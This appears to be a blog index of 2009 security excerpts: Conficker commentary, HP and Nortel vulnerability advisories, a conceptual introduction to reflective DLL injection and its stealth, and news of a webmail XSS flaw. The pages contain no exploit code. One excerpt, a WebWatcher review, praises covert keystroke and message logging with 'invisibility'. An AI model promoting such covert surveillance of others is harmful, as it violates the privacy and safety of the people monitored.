Software And Internet Blog

Conflicker did not unleash a global attack like SQL Slammer- a worm that crippled the Internet in 30 minutes. But, it isn’t because it wasn’t capable per se.

The fact is that crippling the Internet is not a smart business model. It is like showing your hand in poker. Right now there are somewhere between 3 million and 15 million computers compromised by Conficker. Both numbers are big, but the larger point is the range in the estimates. Give or take 12 million PC’s, nobody really knows how big the threat is. There are 12 million PC’s that might be infected, or maybe not.

To unleash the global Conficker army in some sort of massive April Fool’s Day prank that grinds the Internet to a halt just for the sake of doing so might have entertainment value, but it doesn’t generate revenue. What it would do is to help identify the compromised machines, enabling them to be cleaned and patched, and help wipe out the threat. The Conficker creators have a business interest in flying under the radar so they can live to fight- and profit- another day.

So- nothing really happened on April 1st. Does that mean that we can just forget Conficker ever existed and move on? Absolutely not. The fact that nothing visible occurred from Conficker on April 1st means that there are still millions of PC’s- somewhere between 3 million and 15 million- compromised with Conficker. They can send out spam. They can host malware. They can be used in a botnet denial-of-service attack. They are a mercenary army of malicious PC’s for hire.
(more…)

HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

Release Date: 2009-04-20
Last Updated: 2009-04-20

Potential Security Impact:
Remote execution of arbitrary code, Denial of Service (DoS), unauthorized access

Source:
Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP StorageWorks Storage Mirroring. These vulnerabilities could be exploited remotely to execute arbitrary code, cause a Denial of Service (DoS), or gain unauthorized access.

References:
CVE-2009-0716, CVE-2009-0717, CVE-2009-0718

SUPPORTED SOFTWARE VERSIONS*:
ONLY impacted versions are listed.
HP StorageWorks Storage Mirroring v5 prior to v5.1.1.1090.15

BACKGROUND

CVSS 2.0 Base Metrics
===============================================
Reference Base Vector Base Score
CVE-2009-0716 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2009-0717 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2009-0718 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

The Hewlett-Packard Company thanks Zhenhua Liu, Junfeng Jia, and Xiaopeng Zhang of Fortinet’s Fortiguard Global Security Research Team for reporting these vulnerabilities to security-alert (at) hp (dot) com. [email concealed]

(more…)

Summary :
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) loader.

Introduction:
Under the Windows platform, library injection techniques both local and remote have been around for many years. Remote library injection as an exploitation technique was introduced in 2004 by Skape and JT. Their technique employs shellcode to patch the host processes ntdll library at run time and forces the native Windows loader to load a Dynamic Link Library (DLL) image from memory. As an alternative to this technique Stephen presents Reflective DLL Injection.

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host. Previous work in the security field of building PE file loaders include the bo2k server by DilDog

The main advantage of the library loading itself is that it is not registered in any way with the host system and as a result is largely undetectable at both a system and process level. When employed as an exploitation technique, Reflective DLL Injection requires a minimal amount of shellcode, further reducing its detection footprint against host and network based intrusion detection and prevention systems.

A web-borne vulnerability lurking in a popular email application seriously compromised the security of 40 million accounts until it was fixed early last month, independent researchers said.

The flaw, in the Memova messaging application sold by a company known as Critical Path, is yet another testament to the awesome power of XSS, or cross site scripting, vulnerabilities. Combined with another bug, it allowed attackers to surreptitiously forward the email of millions of end-users from some of Europe’s biggest internet service providers.

“The attacker only needs to send a specially crafted email to his victim,” independent researchers Rosario Valotta and Matteo Carli wrote in an advisory. “As soon as the victim opens the mail (no further interaction required) the forwarding settings of his webmail account of silently modified.”

The researchers tested a proof-of-concept attack on Italian ISPs Tiscali, Libero (also known as Wind) and Virgilio (aka Telecom) and found all three to be vulnerable. Using Critical Path press releases announcing customer deployments, they say about a dozen other large ISPs also used Memova, including Vodafone, Virgin, T-Mobile, and Telefonica. All told, that’s 40 million combined users, they say.
(more…)

Vendor description:

The Application Gateway delivers practical, converged voice and data applications on Nortel IP phones that enable organizations to benefit more fully from IP telephony. The prepackaged, easy-to-learn, easy-to-use Voice Office applications help increase productivity and enhance organizational communications - without requiring any integration work. For the hospitality sector, the Guest Services applications provide additional services/features, generate revenue from advertising on the phone screen, and reduce the cost of operations by enabling guests to self serve. Custom development tools are also available to end customers for delivery of customized content to IP phones.

Vulnerability overview:

The Nortel Application Gateway provides an administration interface “Nortel Administration Tool powered by Citrix”. This interface responds with sensitive information to unauthorized users.

Vulnerability description:

The “Nortel Administration Tool powered by Citrix” can be accessed under the URL https://(server):3001/. The subframe “https://(server)(server):3001/adminDownloads.htm” does not show any content in the browser view. However the HTML-source of this frame contains sensitive information like an administrative call server user account:

< div id="call_server_host" value="10.11.12.13">< /div> …
< div id="call_server_telnet_port" value="23">< /div> …
< div id="call_server_user" value="admin123">< /div>
< div id="call_server_pwd" value="hugo123">< /div>

Proof of concept:

This vulnerability can be exploited with a web browser and plugins / web proxy.
(more…)

Detailed Review

Because of its remote viewing capabilities, there is definitely a “Wow” factor to Web Watcher. There is just something high-tech and cool about being able to see what is being recorded from a remote location. On top of that, for anyone with limited access to the computer they are trying to record, this feature is a must-have. Couple this ability with WebWatcher’s exceptional arsenal of monitoring tools, and it’s easy to see why they are our Editor’s Choice.

WebWatcher monitors almost everything including:

• Emails (Both sent and received)
• Instant Messages/Chats
• Tracks all websites that are visited
• Tracks all keystrokes typed on the computer
• Takes screenshot pictures of the monitored computer so you can see graphics, etc.

WebWatcher is a well-rounded application that is capable of both monitoring and Internet filtering, and it has most of the features that you’d expect a serious monitoring application to contain. In addition to that, WebWatcher also offers industrial-grade invisibility. We dug in pretty deeply, and there was no visible trace of the software anywhere.

WebWatcher’s interface is simple and easy to use, and even a computer novice should find that it only takes a few minutes to figure out how everything works. WebWatcher has a few advanced features that border on unnecessary, but for those that take the time to figure them out they’re a nice addition. And since WebWatcher’s interface is actually a website, searching through the recorded information for the juicy items is very easy. In fact, if you use their alert word system, you’ll find that you can save a lot of time by reading just the emails and things that contain words that you are interested in. So, for instance, Web Watcher can display for you just emails that contain specific words, or just the Instant Message conversations with a certain person. It makes finding what you are looking for really easy.
(more…)

Introduction

Windows Server 2008 R2 and the Windows 7 client were made for each other - and made to provide better and more secure computing when used together. DirectAccess is a new feature that allows Windows 7 users to establish a remote connection without a VPN, and the Remote Workspace, along with Presentation Virtualization and Remote Desktop Gateway can allow users to access their company desktops from anywhere, safely and securely. In this article, we will look at these and other features that make the Server 2008 R2/Windows 7 combination the best bet for organizations looking to improve the security of their Windows-based networks.

With the emphasis at Microsoft on trustworthy computing, each edition of the server and client operating systems gets more secure. Windows Server 2008, and especially its latest incarnation, R2, provides IT administrators with many built-in security mechanisms. However, securing the server is only half the battle. The client machine is often targeted for exploit – especially in today’s mobile world where users connect from laptops that leave the company premises and thus are not always under the absolute control of the IT department. If your organization needs a high level of security (and in the current compliance-mandated environment, who doesn’t?), you should be planning ahead for the deployment of the Windows 7 client in combination with Windows Server 2008 R2 as soon after the Win 7 release as possible. Let’s look at some of the advanced security features you’ll be able to take advantage of by doing so.

Note:
Many organizations make it a policy to wait for the first service pack before rolling out a new client OS. Should you wait for SP1 before you deploy Windows 7? The Gartner Group says no. “The first Service Pack for Windows 7 is not necessary for the operating system’s stability and security readiness.”
(more…)